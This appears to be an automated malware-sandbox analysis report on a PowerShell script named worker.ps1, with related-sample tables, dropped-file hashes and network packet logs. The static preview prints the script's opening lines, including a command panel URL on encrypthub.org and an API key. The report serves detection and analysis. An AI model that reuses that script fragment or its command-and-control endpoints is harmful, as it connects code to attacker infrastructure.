                                                      TENET-1ZASJkUU4ScMe.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      iPv1RzhF56.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      DingTalk_v7.6.38.122510801.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      bot.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 146.236.61.230
                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 146.236.61.210
                                                      res.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 146.232.38.25
                                                      res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 152.106.77.55
                                                      3.elfGet hashmaliciousUnknownBrowse
                                                      • 146.69.162.29
                                                      6.elfGet hashmaliciousUnknownBrowse
                                                      • 154.114.95.176
                                                      Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                      • 168.172.227.5
                                                      HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      http://b-world.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://transparent-sticky-burst.glitch.me#dloasayudaenespanol-labor@maryland.govGet hashmaliciousHTMLPhisherBrowse
                                                      • 188.34.148.117
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      Personliche Nachricht fur Friedhelm Hanusch.pdfGet hashmaliciousUnknownBrowse
                                                      • 116.202.167.133
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                      • 88.198.246.242

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eOrdine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 49.12.234.183
                                                      imYD7uep15.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                      • 49.12.234.183
                                                      imYD7uep15.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                      • 49.12.234.183
                                                      ap.batGet hashmaliciousUnknownBrowse
                                                      • 49.12.234.183
                                                      vXn4pan2US.exeGet hashmaliciousUnknownBrowse
                                                      • 49.12.234.183
                                                      Oficio-dedidas-cautelares-delcaraciones-vencidas2021-2022 (1).jsGet hashmaliciousNjratBrowse
                                                      • 49.12.234.183
                                                      AUTO SAA.988.2024 de fecha 11-12-2024, EXP 68861-483-2007.batGet hashmaliciousAsyncRATBrowse
                                                      • 49.12.234.183
                                                      shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 49.12.234.183
                                                      exclude.ps1Get hashmaliciousUnknownBrowse
                                                      • 49.12.234.183
                                                      c2.htaGet hashmaliciousUnknownBrowse
                                                      • 49.12.234.183

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]

                                                      Download File
                                                      Process:C:\Windows\System32\mshta.exe
                                                      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3249
                                                      Entropy (8bit):5.4598794938059125
                                                      Encrypted:false
                                                      SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                      MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                      SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                      SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                      SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):61147
                                                      Entropy (8bit):5.077943793919534
                                                      Encrypted:false
                                                      SSDEEP:1536:wkO+jH0t3VfibjoRjdvRsh4iUx0OFa54/PflJdXOcUKNJfS5bWrxxNvtAHkah/N7:hO+jH0FVfibjoRjdvRsqiUJa54/PflJM
                                                      MD5:515CB043BF4318C538E75FF4830BBC3C
                                                      SHA1:467FDB4C380CAE1D875E310A98FEB0D160E9B970
                                                      SHA-256:1B5C0135682F99090ACFF5DEBEDF2204C161520B8983DF713617CD19202D52B6
                                                      SHA-512:49FFD840C61310DA7E592D6BD2039EB2912962FD3AD15093013C205360D35B4C77435A31E022AC9EA7359884C331F87085EA648FF020CC08E091408DB6BAAF6F
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......Set-SmbServerConfiguration........Remove-SmbGlobalMapping........Set-SmbClientConfiguration........Get-SmbDelegation........gsmbgm........nsmbscm........Get-SmbShareAccess........udsmbmc........dsmbd........ssmbcc........gsmbt........Remove-SmbBandwidthLimit........Get-SmbMultichannelConstraint........gsmbs........gsmbmc........blsmba........Get-SmbMapping.... ...Remove-SmbMultichannelConstraint........gsmbo........Get-SmbServerNetworkInterface........gsmbm...."...Remove-SmbServerCertificateMapping........rsmbscm........Get-SmbConnection........ssmbsc........gsmbd........Disable-SmbDelegation........rksmba........gsmbb........gsmbc........Get-SmbSession........gsmba........Get-SmbMultichannelConnection........Close-SmbOpenFile........Set-SmbPathAcl........New-SmbShare........New-SmbMapping........Revoke-SmbShareAccess........nsmbt........Get-SmbShare........rsmbgm........nsmbs

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z4rx4y2.yw1.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avbweish.mao.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cavkz4hm.jmx.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cubd5jwc.aoa.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osqccazu.2jz.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1h5byu0.ukl.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmkez3be.434.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjf1e20i.3ey.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6221
                                                      Entropy (8bit):3.7244095350444106
                                                      Encrypted:false
                                                      SSDEEP:96:4ttr33CxHt18kvhkvCCtuQV2/YTsH5QV2/YTsHP:CtryN1YuQdyQdS
                                                      MD5:D3F40D4B5EE179B50B56DD9DBA79F6B4
                                                      SHA1:B8127F955AFA9F6C5EE49999B2266E885E534314
                                                      SHA-256:91AF0CDEEBFEBFC1AB7A161F0CF0E8FAB697DB3F3C14A49C8415C0D999F90A8A
                                                      SHA-512:D3E1E6736AE563F4FFB6C4BE2035DB4662CEA1BF8966012AA7420E56D2A74C56133591A71C36666E4F06293F651D4DACC1E521BEF4EB51F85AF779BEB68D9769
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ...-/.v.........h..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......\..h.......h......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^0Z}b...........................%..A.p.p.D.a.t.a...B.V.1.....0Zzb..Roaming.@......CW.^0Zzb............................:.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^0Z.b..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................1E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^0Z.b....Q...........

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDX29LR7SDG7X5WGAY6P.temp

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6221
                                                      Entropy (8bit):3.7244095350444106
                                                      Encrypted:false
                                                      SSDEEP:96:4ttr33CxHt18kvhkvCCtuQV2/YTsH5QV2/YTsHP:CtryN1YuQdyQdS
                                                      MD5:D3F40D4B5EE179B50B56DD9DBA79F6B4
                                                      SHA1:B8127F955AFA9F6C5EE49999B2266E885E534314
                                                      SHA-256:91AF0CDEEBFEBFC1AB7A161F0CF0E8FAB697DB3F3C14A49C8415C0D999F90A8A
                                                      SHA-512:D3E1E6736AE563F4FFB6C4BE2035DB4662CEA1BF8966012AA7420E56D2A74C56133591A71C36666E4F06293F651D4DACC1E521BEF4EB51F85AF779BEB68D9769
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ...-/.v.........h..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......\..h.......h......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^0Z}b...........................%..A.p.p.D.a.t.a...B.V.1.....0Zzb..Roaming.@......CW.^0Zzb............................:.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^0Z.b..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................1E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^0Z.b....Q...........

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.104241463165594
                                                      TrID:
                                                        File name:worker.ps1
                                                        File size:13'608 bytes
                                                        MD5:dfa164f1695a9bd6c212e61c9526b668
                                                        SHA1:86cdd56775d65fd2ae79a64f13e8a49fa45c2faa
                                                        SHA256:5cc0d46909bd6733dd331e2dfcef5ef9b9a9efb709b104c1c9a9d49026715065
                                                        SHA512:cb47e448f90501a2505737dc8ed09861bfb25c6e3e2143dcf8878c234c003e9a28f05e445bbec7923ec8c4561de4dd58334333a8f79f1806cb293780b7c3867f
                                                        SSDEEP:384:CSXCaO3XjGdfaYxZCy4oyCPWhWJa7uZkOT4:CSXCZ39QP5S
                                                        TLSH:EE5292A97E49D14802B39B3EE977A100F939517B11665806FADCC1E43F704AEC3BDE88
                                                        File Content Preview:$ErrorActionPreference = 'SilentlyContinue'..$ProgressPreference = 'SilentlyContinue'..$SERVER_URL = "https://encrypthub.org/panel/"# Panel..#-----------------..$buildType = "Main"..$serverLocation = "http://encrypthub.org:8080"..$apiKey = "jX7fB9k8R#zP2T

                                                        File Icon

                                                        Icon Hash:3270d6baae77db44

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 16, 2025 13:20:07.784118891 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:07.784183025 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:07.784246922 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:07.796780109 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:07.796794891 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.465692043 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.465871096 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:08.469713926 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:08.469749928 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.470047951 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.493751049 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:08.535326958 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.755389929 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.755445957 CET4434973049.12.234.183192.168.2.4
                                                        Jan 16, 2025 13:20:08.756520987 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:08.759622097 CET49730443192.168.2.449.12.234.183
                                                        Jan 16, 2025 13:20:09.290769100 CET49731443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.290865898 CET44349731146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:09.290961027 CET49731443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.301361084 CET49731443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.301393032 CET44349731146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:09.832612038 CET49732443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.832669973 CET44349732146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:09.832915068 CET49732443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.833352089 CET49732443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:09.833358049 CET44349732146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.073643923 CET44349731146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.073738098 CET49731443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.079946995 CET49731443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.079991102 CET44349731146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.085442066 CET49739443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.085524082 CET44349739146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.085619926 CET49739443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.085921049 CET49739443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.085952997 CET44349739146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.615330935 CET44349732146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.615410089 CET49732443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.619055986 CET49732443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.619079113 CET44349732146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.620198965 CET49740443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.620239019 CET44349740146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:20:52.620332956 CET49740443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.620630026 CET49740443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:20:52.620639086 CET44349740146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:34.849663973 CET44349739146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:34.849842072 CET49739443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:34.850636959 CET49739443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:34.850678921 CET44349739146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:35.416075945 CET44349740146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:35.416815996 CET49740443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:35.420614958 CET49740443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:35.420634985 CET44349740146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:36.075994015 CET49989443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:36.076035976 CET44349989146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:21:36.078737974 CET49989443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:36.079356909 CET49989443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:21:36.079375982 CET44349989146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:22:18.821362019 CET44349989146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:22:18.821444035 CET49989443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:22:18.822240114 CET49989443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:22:18.822246075 CET44349989146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:22:18.823240995 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:22:18.823333979 CET44350008146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:22:18.823442936 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:22:18.823791027 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:22:18.823824883 CET44350008146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:01.603116989 CET44350008146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:01.605321884 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:01.605323076 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:01.906991005 CET50008443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:01.907056093 CET44350008146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:02.276906013 CET50009443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:02.276994944 CET44350009146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:02.277218103 CET50009443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:02.277395964 CET50009443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:02.277434111 CET44350009146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:45.040724993 CET44350009146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:45.040796995 CET50009443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:45.041516066 CET50009443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:45.041538000 CET44350009146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:45.042637110 CET50010443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:45.042673111 CET44350010146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:23:45.042722940 CET50010443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:45.043021917 CET50010443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:23:45.043030977 CET44350010146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:24:27.812118053 CET44350010146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:24:27.812217951 CET50010443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:24:27.813041925 CET50010443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:24:27.813060999 CET44350010146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:24:28.464231014 CET50011443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:24:28.464268923 CET44350011146.70.233.10192.168.2.4
                                                        Jan 16, 2025 13:24:28.464411020 CET50011443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:24:28.464705944 CET50011443192.168.2.4146.70.233.10
                                                        Jan 16, 2025 13:24:28.464723110 CET44350011146.70.233.10192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 16, 2025 13:20:07.683728933 CET5161953192.168.2.41.1.1.1
                                                        Jan 16, 2025 13:20:07.691412926 CET53516191.1.1.1192.168.2.4
